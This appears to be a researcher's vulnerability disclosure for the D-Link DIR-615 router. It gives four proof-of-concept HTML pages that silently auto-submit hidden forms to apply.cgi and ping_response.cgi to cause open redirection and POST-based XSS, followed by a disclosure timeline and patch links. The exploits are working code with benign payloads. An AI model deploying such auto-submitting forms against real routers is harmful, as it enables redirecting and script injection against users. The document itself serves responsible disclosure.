D-Link DIR-615 Open Redirection and XSS

D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10

The ‘apply.cgi’ file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in ‘apply.cgi’. For example the ‘ping_response.cgi’ file.

Open Redirection

apply.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
    <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

ping_response.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
      <input type="hidden" name="ping_ipaddr" value="192.168.0.101" />
      <input type="hidden" name="ping" value="Ping" />
    <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

screenshot_1

POST XSS

apply.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
    <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

xss2

ping_response.cgi

<html>
  <!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
      <input type="hidden" name="ping_ipaddr" value="127.0.0.1" />
      <input type="hidden" name="ping" value="Ping" />
      <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

xss

Disclosure Timeline

12/19/16: Reported to D-Link
12/21/16: Security Patch released
ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVE/DIR-615_REVE_RELEASE_NOTES_5.14B01.pdf

Patched Firmware

ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVE/DIR-615_REVE_FIRMWARE_PATCH_5.14B01.zip

https://www.exploit-db.com/exploits/41033/

Leave a Reply